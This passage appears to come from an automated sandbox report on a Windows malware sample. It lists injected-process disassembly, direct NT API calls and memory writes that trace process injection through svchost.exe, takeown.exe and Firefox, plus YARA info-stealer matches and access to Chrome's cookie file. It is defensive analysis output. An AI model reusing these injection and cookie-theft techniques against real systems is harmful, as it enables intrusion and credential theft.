                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03154A35 mov eax, dword ptr fs:[00000030h]3_2_03154A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03154A35 mov eax, dword ptr fs:[00000030h]3_2_03154A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0316CA38 mov eax, dword ptr fs:[00000030h]3_2_0316CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0316CA24 mov eax, dword ptr fs:[00000030h]3_2_0316CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0315EA2E mov eax, dword ptr fs:[00000030h]3_2_0315EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03136A50 mov eax, dword ptr fs:[00000030h]3_2_03136A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03136A50 mov eax, dword ptr fs:[00000030h]3_2_03136A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03136A50 mov eax, dword ptr fs:[00000030h]3_2_03136A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03136A50 mov eax, dword ptr fs:[00000030h]3_2_03136A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03136A50 mov eax, dword ptr fs:[00000030h]3_2_03136A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03136A50 mov eax, dword ptr fs:[00000030h]3_2_03136A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03136A50 mov eax, dword ptr fs:[00000030h]3_2_03136A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03140A5B mov eax, dword ptr fs:[00000030h]3_2_03140A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03140A5B mov eax, dword ptr fs:[00000030h]3_2_03140A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031ACA72 mov eax, dword ptr fs:[00000030h]3_2_031ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031ACA72 mov eax, dword ptr fs:[00000030h]3_2_031ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0316CA6F mov eax, dword ptr fs:[00000030h]3_2_0316CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0316CA6F mov eax, dword ptr fs:[00000030h]3_2_0316CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0316CA6F mov eax, dword ptr fs:[00000030h]3_2_0316CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031DEA60 mov eax, dword ptr fs:[00000030h]3_2_031DEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03168A90 mov edx, dword ptr fs:[00000030h]3_2_03168A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0313EA80 mov eax, dword ptr fs:[00000030h]3_2_0313EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0313EA80 mov eax, dword ptr fs:[00000030h]3_2_0313EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0313EA80 mov eax, dword ptr fs:[00000030h]3_2_0313EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0313EA80 mov eax, dword ptr fs:[00000030h]3_2_0313EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0313EA80 mov eax, dword ptr fs:[00000030h]3_2_0313EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0313EA80 mov eax, dword ptr fs:[00000030h]3_2_0313EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0313EA80 mov eax, dword ptr fs:[00000030h]3_2_0313EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0313EA80 mov eax, dword ptr fs:[00000030h]3_2_0313EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0313EA80 mov eax, dword ptr fs:[00000030h]3_2_0313EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03204A80 mov eax, dword ptr fs:[00000030h]3_2_03204A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03138AA0 mov eax, dword ptr fs:[00000030h]3_2_03138AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03138AA0 mov eax, dword ptr fs:[00000030h]3_2_03138AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03186AA4 mov eax, dword ptr fs:[00000030h]3_2_03186AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03130AD0 mov eax, dword ptr fs:[00000030h]3_2_03130AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03164AD0 mov eax, dword ptr fs:[00000030h]3_2_03164AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03164AD0 mov eax, dword ptr fs:[00000030h]3_2_03164AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03186ACC mov eax, dword ptr fs:[00000030h]3_2_03186ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03186ACC mov eax, dword ptr fs:[00000030h]3_2_03186ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03186ACC mov eax, dword ptr fs:[00000030h]3_2_03186ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0316AAEE mov eax, dword ptr fs:[00000030h]3_2_0316AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0316AAEE mov eax, dword ptr fs:[00000030h]3_2_0316AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031BC912 mov eax, dword ptr fs:[00000030h]3_2_031BC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03128918 mov eax, dword ptr fs:[00000030h]3_2_03128918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03128918 mov eax, dword ptr fs:[00000030h]3_2_03128918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031AE908 mov eax, dword ptr fs:[00000030h]3_2_031AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031AE908 mov eax, dword ptr fs:[00000030h]3_2_031AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031B892A mov eax, dword ptr fs:[00000030h]3_2_031B892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031C892B mov eax, dword ptr fs:[00000030h]3_2_031C892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031B0946 mov eax, dword ptr fs:[00000030h]3_2_031B0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03204940 mov eax, dword ptr fs:[00000030h]3_2_03204940
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031D4978 mov eax, dword ptr fs:[00000030h]3_2_031D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031D4978 mov eax, dword ptr fs:[00000030h]3_2_031D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031BC97C mov eax, dword ptr fs:[00000030h]3_2_031BC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03156962 mov eax, dword ptr fs:[00000030h]3_2_03156962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03156962 mov eax, dword ptr fs:[00000030h]3_2_03156962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03156962 mov eax, dword ptr fs:[00000030h]3_2_03156962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0317096E mov eax, dword ptr fs:[00000030h]3_2_0317096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0317096E mov edx, dword ptr fs:[00000030h]3_2_0317096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0317096E mov eax, dword ptr fs:[00000030h]3_2_0317096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031B89B3 mov esi, dword ptr fs:[00000030h]3_2_031B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031B89B3 mov eax, dword ptr fs:[00000030h]3_2_031B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031B89B3 mov eax, dword ptr fs:[00000030h]3_2_031B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031309AD mov eax, dword ptr fs:[00000030h]3_2_031309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031309AD mov eax, dword ptr fs:[00000030h]3_2_031309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0313A9D0 mov eax, dword ptr fs:[00000030h]3_2_0313A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0313A9D0 mov eax, dword ptr fs:[00000030h]3_2_0313A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0313A9D0 mov eax, dword ptr fs:[00000030h]3_2_0313A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0313A9D0 mov eax, dword ptr fs:[00000030h]3_2_0313A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0313A9D0 mov eax, dword ptr fs:[00000030h]3_2_0313A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0313A9D0 mov eax, dword ptr fs:[00000030h]3_2_0313A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031649D0 mov eax, dword ptr fs:[00000030h]3_2_031649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031FA9D3 mov eax, dword ptr fs:[00000030h]3_2_031FA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031C69C0 mov eax, dword ptr fs:[00000030h]3_2_031C69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031629F9 mov eax, dword ptr fs:[00000030h]3_2_031629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031629F9 mov eax, dword ptr fs:[00000030h]3_2_031629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031BE9E0 mov eax, dword ptr fs:[00000030h]3_2_031BE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031BC810 mov eax, dword ptr fs:[00000030h]3_2_031BC810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03152835 mov eax, dword ptr fs:[00000030h]3_2_03152835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03152835 mov eax, dword ptr fs:[00000030h]3_2_03152835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03152835 mov eax, dword ptr fs:[00000030h]3_2_03152835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03152835 mov ecx, dword ptr fs:[00000030h]3_2_03152835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03152835 mov eax, dword ptr fs:[00000030h]3_2_03152835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03152835 mov eax, dword ptr fs:[00000030h]3_2_03152835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0316A830 mov eax, dword ptr fs:[00000030h]3_2_0316A830
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031D483A mov eax, dword ptr fs:[00000030h]3_2_031D483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031D483A mov eax, dword ptr fs:[00000030h]3_2_031D483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03160854 mov eax, dword ptr fs:[00000030h]3_2_03160854
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03134859 mov eax, dword ptr fs:[00000030h]3_2_03134859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03134859 mov eax, dword ptr fs:[00000030h]3_2_03134859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031BE872 mov eax, dword ptr fs:[00000030h]3_2_031BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031BE872 mov eax, dword ptr fs:[00000030h]3_2_031BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031C6870 mov eax, dword ptr fs:[00000030h]3_2_031C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031C6870 mov eax, dword ptr fs:[00000030h]3_2_031C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031BC89D mov eax, dword ptr fs:[00000030h]3_2_031BC89D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03130887 mov eax, dword ptr fs:[00000030h]3_2_03130887
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0315E8C0 mov eax, dword ptr fs:[00000030h]3_2_0315E8C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_032008C0 mov eax, dword ptr fs:[00000030h]3_2_032008C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0316C8F9 mov eax, dword ptr fs:[00000030h]3_2_0316C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0316C8F9 mov eax, dword ptr fs:[00000030h]3_2_0316C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031FA8E4 mov eax, dword ptr fs:[00000030h]3_2_031FA8E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03132F12 mov eax, dword ptr fs:[00000030h]3_2_03132F12
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0316CF1F mov eax, dword ptr fs:[00000030h]3_2_0316CF1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031E6F00 mov eax, dword ptr fs:[00000030h]3_2_031E6F00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0315EF28 mov eax, dword ptr fs:[00000030h]3_2_0315EF28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0312CF50 mov eax, dword ptr fs:[00000030h]3_2_0312CF50
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B580A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_00B580A9
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B2A124 SetUnhandledExceptionFilter,0_2_00B2A124
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B2A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00B2A155

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeNtAllocateVirtualMemory: Direct from: 0x77172BFCJump to behavior
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeNtDelayExecution: Direct from: 0x77172DDCJump to behavior
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeNtProtectVirtualMemory: Direct from: 0x77167B2EJump to behavior
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeNtQuerySystemInformation: Direct from: 0x77172DFCJump to behavior
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeNtReadFile: Direct from: 0x77172ADCJump to behavior
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeNtQueryInformationProcess: Direct from: 0x77172C26Jump to behavior
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeNtResumeThread: Direct from: 0x77172FBCJump to behavior
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeNtWriteVirtualMemory: Direct from: 0x7717490CJump to behavior
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeNtCreateUserProcess: Direct from: 0x7717371CJump to behavior
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeNtOpenKeyEx: Direct from: 0x77172B9CJump to behavior
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeNtNotifyChangeKey: Direct from: 0x77173C2CJump to behavior
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeNtSetInformationProcess: Direct from: 0x77172C5CJump to behavior
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeNtProtectVirtualMemory: Direct from: 0x77172F9CJump to behavior
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeNtResumeThread: Direct from: 0x771736ACJump to behavior
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeNtMapViewOfSection: Direct from: 0x77172D1CJump to behavior
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeNtWriteVirtualMemory: Direct from: 0x77172E3CJump to behavior
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeNtCreateMutant: Direct from: 0x771735CCJump to behavior
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeNtDeviceIoControlFile: Direct from: 0x77172AECJump to behavior
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeNtAllocateVirtualMemory: Direct from: 0x77172BECJump to behavior
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeNtTerminateThread: Direct from: 0x77172FCCJump to behavior
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeNtQueryInformationToken: Direct from: 0x77172CACJump to behavior
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeNtCreateFile: Direct from: 0x77172FECJump to behavior
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeNtOpenFile: Direct from: 0x77172DCCJump to behavior
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeNtClose: Direct from: 0x77172B6C
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeNtSetInformationThread: Direct from: 0x771663F9Jump to behavior
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeNtAllocateVirtualMemory: Direct from: 0x77173C9CJump to behavior
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeNtQueryAttributesFile: Direct from: 0x77172E6CJump to behavior
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeNtSetInformationThread: Direct from: 0x77172B4CJump to behavior
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeNtCreateKey: Direct from: 0x77172C6CJump to behavior
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeNtReadVirtualMemory: Direct from: 0x77172E8CJump to behavior
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeNtQueryVolumeInformationFile: Direct from: 0x77172F2CJump to behavior
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeNtAllocateVirtualMemory: Direct from: 0x771748ECJump to behavior
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeNtQuerySystemInformation: Direct from: 0x771748CCJump to behavior
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeNtOpenSection: Direct from: 0x77172E0CJump to behavior
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\takeown.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: NULL target: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: NULL target: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeThread register set: target process: 7852Jump to behavior
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 263E008Jump to behavior
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B587B1 LogonUserW,0_2_00B587B1
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B03B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00B03B3A
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00B048D7
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B64C27 mouse_event,0_2_00B64C27
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\gbdXRnNKkm.exe"Jump to behavior
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeProcess created: C:\Windows\SysWOW64\takeown.exe "C:\Windows\SysWOW64\takeown.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B57CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00B57CAF
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B5874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00B5874B
                Source: gbdXRnNKkm.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: gbdXRnNKkm.exe, D3y5b0UXPl.exe, 00000009.00000000.1333493377.0000000000DD1000.00000002.00000001.00040000.00000000.sdmp, D3y5b0UXPl.exe, 00000009.00000002.3660414681.0000000000DD1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: D3y5b0UXPl.exe, 00000009.00000000.1333493377.0000000000DD1000.00000002.00000001.00040000.00000000.sdmp, D3y5b0UXPl.exe, 00000009.00000002.3660414681.0000000000DD1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: D3y5b0UXPl.exe, 00000009.00000000.1333493377.0000000000DD1000.00000002.00000001.00040000.00000000.sdmp, D3y5b0UXPl.exe, 00000009.00000002.3660414681.0000000000DD1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program ManagerW
                Source: D3y5b0UXPl.exe, 00000009.00000000.1333493377.0000000000DD1000.00000002.00000001.00040000.00000000.sdmp, D3y5b0UXPl.exe, 00000009.00000002.3660414681.0000000000DD1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B2862B cpuid 0_2_00B2862B
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B34E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00B34E87
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B41E06 GetUserNameW,0_2_00B41E06
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B33F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00B33F3A
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00B049A0

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 3.2.svchost.exe.4f0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.svchost.exe.4f0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.1412763215.0000000002FB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3660621967.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3660737432.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1414559541.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3660890231.00000000038C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3658971513.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1412334229.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3667213701.0000000008450000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\takeown.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
